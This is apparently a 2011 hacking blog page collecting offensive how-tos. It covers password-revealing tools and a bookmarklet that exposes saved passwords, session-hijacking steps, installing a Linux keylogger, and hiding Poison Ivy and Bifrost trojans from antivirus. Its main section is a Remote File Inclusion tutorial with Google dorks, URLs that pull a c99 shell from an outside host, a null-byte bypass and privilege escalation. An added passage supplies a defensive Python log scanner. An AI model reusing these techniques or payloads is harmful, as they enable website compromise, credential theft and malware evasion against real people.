Monday, June 20, 2011

Windows Password Recovery Tools

MessenPass: Recovers the passwords of the most popular instant messenger programs in Windows: MSN Messenger, Windows Messenger, Windows Live Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.
Mail PassView: Recovers the passwords of the following email programs: Windows Live Mail, Windows Mail, Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP accounts), IncrediMail, Eudora, Netscape Mail, and Mozilla Thunderbird.
Mail PassView can also recover the passwords of web-based email accounts (Hotmail, Yahoo!, Gmail) if you use the programs associated with these accounts.
IE PassView: A small utility that reveals the passwords stored by the Internet Explorer browser. It supports Internet Explorer 7.0 and 8.0 as well as the older versions, v4.0 to v6.0.
Protected Storage PassView: Recovers all passwords stored inside the Windows Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of password-protected sites, MSN Explorer passwords, and more.
Dialupass: Password recovery tool that reveals all passwords stored in the dial-up entries of Windows (Internet and VPN connections). This tool works in all versions of Windows, including Windows 2000, Windows XP, Windows Vista, Windows 7, and Windows Server 2003/2008.
BulletsPassView: A password recovery tool that reveals the passwords hidden behind the bullets in the standard password text box of the Windows operating system and the Internet Explorer web browser. After revealing the passwords, you can easily copy them to the clipboard or save them to a text/html/csv/xml file.
You can use this tool to recover the passwords of many Windows applications, such as CuteFTP, FileZilla, VNC, and more.
Network Password Recovery: Recovers network share passwords stored by Windows XP, Windows Vista, Windows 7, and Windows Server 2003/2008.
SniffPass: Password sniffer for Windows that captures the passwords passing through your network adapter and displays them on the screen instantly.
You can use this utility to recover lost Web/FTP/Email passwords.
RouterPassView: Windows utility that can recover lost passwords from a configuration file saved by a router. It only works if your router saves the configuration file in a format that RouterPassView can detect and decrypt.
PstPassword: Recovers the lost password of an Outlook PST file.
PasswordFox: A small password recovery tool for Windows that allows you to view the user names and passwords stored by the Mozilla Firefox web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select any other Firefox profile instead. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.
ChromePass: A small password recovery tool for Windows that allows you to view the user names and passwords stored by the Google Chrome web browser. For each password entry, the following information is displayed: Origin URL, Action URL, User Name Field, Password Field, User Name, Password, and Created Time. You can select one or more items and then save them to a text/html/xml file or copy them to the clipboard.
WebBrowserPassView: A password recovery tool that reveals the passwords stored by the following web browsers: Internet Explorer (versions 4.0 to 8.0), Mozilla Firefox (all versions), Google Chrome, and Opera. This tool can be used to recover your lost or forgotten password for any website, including popular sites such as Facebook, Yahoo, Google, and Gmail, as long as the password is stored by your web browser. After retrieving your lost passwords, you can save them to a text/html/csv/xml file using the ‘Save Selected Items’ option (Ctrl+S).
WirelessKeyView: Recovers all wireless network keys (WEP/WPA) stored on your computer by the ‘Wireless Zero Configuration’ service of Windows XP and by the ‘WLAN AutoConfig’ service of Windows 7 and Windows Vista. It allows you to easily save all keys to a text/html/xml file, or copy a single key to the clipboard.
Remote Desktop PassView: A small utility that reveals the password stored by the Microsoft Remote Desktop Connection utility inside .rdp files.
VNCPassView: A small Windows utility that recovers the passwords stored by the VNC tool. It can recover two kinds of passwords: the password stored for the currently logged-on user (HKEY_CURRENT_USER in the Registry) and the password stored for all users.
RemotePocketAsterisk: Reveals the password stored behind the asterisks on a Pocket PC device.

Original Source : www.nirsoft.net

Microsoft Sysinternals Suite

The Sysinternals Troubleshooting Utilities have been rolled up into a single Suite of tools. This file contains the individual troubleshooting tools and help files. It does not contain non-troubleshooting tools like the BSOD Screen Saver or NotMyFault.

The Suite is a bundling of the following selected Sysinternals Utilities:

 

How To View Hidden Password behind ****

After opening the web page, paste the JavaScript given below into the address bar and press Enter.

javascript:(function(){
  var s, F, j, f, i;
  s = "";
  F = document.forms;
  for (j = 0; j < F.length; ++j) {
    f = F[j];
    for (i = 0; i < f.length; ++i) {
      if (f[i].type.toLowerCase() == "password") s += f[i].value + "\n";
    }
  }
  if (s) alert("Passwords in forms on this page:\n\n" + s);
  else alert("There are no passwords in forms on this page.");
})();

(The script is shown percent-decoded and indented for readability; paste it as a single line.)

You can use this script when someone has checked the “remember me” box in a website's login form, to reveal the autofilled password hidden behind the asterisks.

Session Hijacking


Session hijacking is when an attacker gets access to the session state of a particular user. The attacker steals a valid session ID, which is then used to get into the system and snoop on the data.
TCP session hijacking is when a hacker takes over a TCP session between two machines. Since most authentication only occurs at the start of a TCP session, this allows the hacker to gain access to a machine.

Types of Session Hijacking


There are two types of session hijacking attacks:

Active: In an active attack, the attacker finds an active session and takes it over.
Passive: In a passive attack, the attacker hijacks a session but sits back and watches, recording all the traffic that is sent back and forth.

Steps in Session Hijacking
  1. Place yourself between the victim and the target (you must be able to sniff the network)
  2. Monitor the flow of packets
  3. Predict the sequence number
  4. Kill the connection to the victim’s machine
  5. Take over the session
  6. Start injecting packets to the target server.

Tools and descriptions:
Juggernaut: A network sniffer that can be used to hijack TCP sessions. It runs on Linux operating systems.
Hunt: A program that can be used to listen to, intercept, and hijack active sessions on a network.
IP Watcher: A commercial session hijacking tool that lets you monitor connections and has active facilities for taking over a session.
Paros HTTP Hijacker: Paros is a man-in-the-middle proxy and application vulnerability scanner.
T-Sight: A session hijacking tool for Windows.

Keylogger for Linux

Many people believe that Trojans don't work against Linux operating systems. The reality is that Trojans do work against Linux, but they infect the system in a different manner.

Download LKL

LKL is a well-known Linux keylogger that runs under Linux on the x86 architecture. LKL sniffs and logs everything that passes through the hardware keyboard port (0x60) and translates keycodes to ASCII using a keymap file. Because it reads the I/O port directly, it needs root privileges to run.




Installation:

The ‘configure’ shell script attempts to guess correct values for various system-dependent variables used during compilation.


It uses those values to create a ‘Makefile’ in each directory of the package. It may also create one or more ‘.h’ files containing system-dependent definitions.

Finally, it creates a shell script ‘config.status’ that you can run in the future to recreate the current configuration, a file ‘config.cache’ that saves the results of its tests to speed up reconfiguring, and a file ‘config.log’ containing compiler output (useful mainly for debugging ‘configure’).


If you need to do unusual things to compile the package, please try to figure out how ‘configure’ could check whether to do them, and mail diffs or instructions to the address given in the ‘README’ so they can be considered for the next release.

If at some point ‘config.cache’ contains results you don’t want to keep, you may remove or edit it.
The file ‘configure.in’ is used to create ‘configure’ by a program called ‘autoconf’. You only need ‘configure.in’ if you want to change it or regenerate ‘configure’ using a newer version of ‘autoconf’.

The simplest way to compile this package is:

1. ‘cd’ to the directory containing the package’s source code and type ‘./configure’ to configure the package for your system.

If you’re using ‘csh’ on an old version of System V, you might need to type ‘sh ./configure’ instead to prevent ‘csh’ from trying to execute ‘configure’ itself.

Running ‘configure’ takes a while. While running, it prints some messages telling which features it is checking for.

2. Type ‘make’ to compile the package.

3. Optionally, type ‘make check’ to run any self-tests that come with the package.

4. Type ‘make install’ to install the programs and any data files and documentation.

5. You can remove the program binaries and object files from the source code directory by typing ‘make clean’. To also remove the files that ‘configure’ created (so you can compile the package for a different kind of computer), type ‘make distclean’.

There is also a ‘make maintainer-clean’ target, but that is intended mainly for the package’s developers. If you use it, you may have to get all sorts of other programs in order to regenerate files that came with the distribution.

How to make a trojan almost FUD easily

Nowadays crypting a trojan doesn't give good results if you use a public crypter; otherwise you need to buy a private edition or to hex it.

So here's a little tip on how to make it almost FUD.

We are going to need a privacy protection software program.

This kind of software is used by program creators to protect their creations from cracking and reverse engineering. We are going to do the same
to a trojan and you are going to see the result.



First of all you need to download the program: scroll down and you will find the download link.
Let's start:

server’s location ->



[Image: 29726338.jpg]

then -> general


[Image: 91158931.jpg]

Security & Encryption


[Image: 50217601.jpg]

Protection Method


[Image: 47781258.jpg]

And we are done!
Results:
Poison Ivy server:


[Image: scnnp.jpg]
Bifrost server:


[Image: scanno.jpg]



Saturday, June 18, 2011

Hacking Websites by Remote File Inclusion (RFI)

Today I am going to explain an advanced method of hacking websites: how to hack websites using Remote File Inclusion. As the name suggests, Remote File Inclusion is a technique where the attacker inserts a file (in hacking terminology called a shell) into the website and gets admin rights. Let's discuss this type of website hacking technique in detail, so friends, read on...

[Image: Remote File Inclusion: Website hacking method]

What is Remote File Inclusion?
Remote File Inclusion is a method of hacking websites and getting admin rights on the server by inserting a remote file, usually called a SHELL (a shell is a graphical user interface file used for browsing the remote files and running your own code on the web server), into a website. Its inclusion allows the hacker to execute server-side commands as the currently logged-on user and to access all the server's files. With these rights we can go on to use local exploits to escalate our privileges and gain control over the whole server.
Note: Remote File Inclusion (RFI) is the best ever technique to hack websites, and more than 60% of websites on the internet using PHP are vulnerable to this attack.


Which Websites are Vulnerable to Remote File Inclusion attack?
The first and most basic question that arises in the mind of new hackers is how we can find websites that are prone to remote file inclusion attacks, and what the basic vulnerabilities in a website are that we will target to hack a website and web server. The answer to these questions is quite simple.
Many web servers are vulnerable to this type of attack because of PHP's default settings of register_globals and allow_url_fopen being enabled.
Note: In PHP 6.0, register_globals has been removed, but the second vulnerability still remains open, so we can give it a try on websites running the latest version of PHP too. The good news for hackers is that around 90% of websites on the internet still use old versions of PHP, and among those 90%, more than 60% have the default settings enabled. That means we can hack most of the websites and deface them. Isn't that cool? But as I have said, we are ethical hackers; we only find vulnerabilities in the websites.


Now let's start the step by step Remote File Inclusion method to hack websites:
Step 1: Finding the Vulnerable Websites
First of all we have to find a website that loads its pages using the PHP include() function and is vulnerable to RFI (Remote File Inclusion). The best technique is to find websites using Google dorks. Google dorks are simply queries used to identify specific search results.
Download the list of dorks for RFI: CLICK HERE
I have already listed a lot of Google dorks in my previous post on hacking websites, so you can look them up here:


Step 2: Identifying a Vulnerable Website

Websites that have a page navigation system similar to the one shown below:
http://target-site.com/index.php?page=PageName

Step 3: Checking Whether the Website is Vulnerable
To check whether the website is vulnerable to a remote file inclusion attack, we try to include a website link instead of PageName, as shown below:
http://target-site.com/index.php?page=http://google.com

Now if the Google home page opens, it is confirmed that the website is vulnerable to Remote File Inclusion and we continue our attack. If the Google home page doesn't open, we try another website.


Step 4: Remote Inclusion of Shells
Now we know that the website is hackable, so we will include a shell into the website. There are a number of shells available online, but my favourites are C99 and r57 because of their extended functionality and features.
There is no need to download these shells to your own system or PC; we can directly use the online copies, but if you wish you can download them from their respective websites. I will not provide them here because it is unethical, but Google it and you can find them easily.
To find a shell, the hacker would search Google for:
inurl:c99.txt
This will display many websites with the shell already up and ready to be included.
Note: you must include a ? after the URL of the shell so that anything that comes after c99.txt is passed to the shell as a query string and does not cause problems.

For future analysis you can download these shells from here:

The new URL with the shell included would look like:
 http://target-site.com/index.php?page=http://site.com/c99.txt?

Step 5: Adding a Null Byte
Sometimes the PHP script on the server appends “.php” to the end of every included file. So if you included the shell, the name would end up as “c99.txt.php” and not work. To get around this, you would add a null byte to the end of c99.txt, which tells the server to ignore everything after c99.txt.


Step 6: Vulnerability Databases
In step one, I told you that hackers use Google dorks to look for sites possibly vulnerable to RFI. An example of a Google dork would be:
  allinurl:.php?page=
This looks for URLs with .php?page= in them. This is only an example and you most likely won't find any vulnerable sites with that search. You can try switching the word “page” with other letters and similar words.

Hackers usually search vulnerability databases like www.milw0rm.com for already discovered RFI vulnerabilities in site content management systems and search for websites that are running that vulnerable web application with a Google dork.

Step 7: If the Attack is Successful
If we succeed in getting the server to parse the shell, we will see a screen similar to the following:

[Image: Hacking a website using a shell (RFI attack)]

The shell will display information about the remote server and list all the files and directories on it. From here we would find a directory that has read and write privileges and upload the shell again, this time as a .php file, so that in case the vulnerability is fixed we will still be able to access it later on.


Step 8: Gaining Root Privileges on the Server
Now we would look for a way to gain root privileges on the system. We can do this by uploading and running local exploits against the server; you can find a list of such exploits on milw0rm. We could also search the victim server for configuration files. These files most of the time contain usernames and passwords for the MySQL databases and such.

That's all about hacking websites using the remote file inclusion method. I hope you all have liked it. I am sure you have a lot of questions regarding this, so don't hesitate to ask in the comments. I will try to clear up all your queries.


How to Protect your Websites and Forums from Remote File Inclusion Attacks
As we are ethical hackers, I will also explain how webmasters can protect their websites from RFI attacks.
To protect yourself from RFI attacks, simply make sure you are using up-to-date scripts, and make sure your server's php.ini file has register_globals and allow_url_fopen disabled.
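The probes described in steps 3 to 5 (a URL in the page parameter, a trailing ?, a null byte) leave distinctive traces in the web server's access log, so here is an added example, not part of the original post, of a small Python scanner that parses constructed Apache-style log lines and flags page parameters carrying a remote URL, a null byte, or path traversal. The log lines, client IPs and the LOG_RE, classify_request and scan_log names are all assumptions of this example.

```python
import re
from urllib.parse import urlparse, parse_qs, unquote

# Constructed sample access-log lines (Apache combined format), not taken
# from the page: one benign request, then the google.com probe from step 3,
# a remote shell include from step 4, and a null-byte / traversal attempt.
SAMPLE_LOG = """\
203.0.113.5 - - [18/Jun/2011:10:00:01 +0000] "GET /index.php?page=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [18/Jun/2011:10:00:07 +0000] "GET /index.php?page=http://google.com HTTP/1.1" 200 2048 "-" "curl/7.21"
203.0.113.9 - - [18/Jun/2011:10:00:12 +0000] "GET /index.php?page=http://site.com/c99.txt? HTTP/1.1" 200 9100 "-" "curl/7.21"
203.0.113.9 - - [18/Jun/2011:10:00:20 +0000] "GET /index.php?page=../../etc/passwd%00 HTTP/1.1" 200 300 "-" "curl/7.21"
"""

# Minimal parser for the fields we need from a combined-format line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)

# A parameter value that starts with a URL scheme is the RFI signature from
# steps 3 and 4 of the page; ftp:// is included as a generalisation.
REMOTE_SCHEME = re.compile(r'^(https?|ftp)://', re.IGNORECASE)


def classify_request(path):
    """Return the RFI/LFI indicators found in the query string of one request path."""
    indicators = []
    query = urlparse(path).query          # everything after the first '?'
    # parse_qs already percent-decodes once; unquote again so a double-encoded
    # payload (%2500 -> %00 -> NUL) is still caught.
    for name, values in parse_qs(query, keep_blank_values=True).items():
        for value in values:
            value = unquote(value)
            if REMOTE_SCHEME.match(value):
                indicators.append(f"{name}: remote URL")
            if "\x00" in value:                       # the step 5 null-byte trick
                indicators.append(f"{name}: null byte")
            if "../" in value.replace("\\", "/"):     # local file inclusion variant
                indicators.append(f"{name}: path traversal")
    return indicators


def scan_log(text):
    """Return (client_ip, request_path, indicators) for every suspicious request."""
    hits = []
    for line in text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue                                  # skip lines we cannot parse
        found = classify_request(match.group("path"))
        if found:
            hits.append((match.group("ip"), match.group("path"), found))
    return hits


if __name__ == "__main__":
    for ip, path, found in scan_log(SAMPLE_LOG):
        print(f"{ip} {path} -> {', '.join(found)}")
```

Since PHP 5.2 the inclusion of remote URLs by include() is governed by the separate allow_url_include setting (off by default), so check that setting alongside allow_url_fopen when hardening php.ini.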

Note: Website hacking is illegal, this article is for Educational purposes only.

Thanks for reading.. Enjoy and have Happy Hacking..:)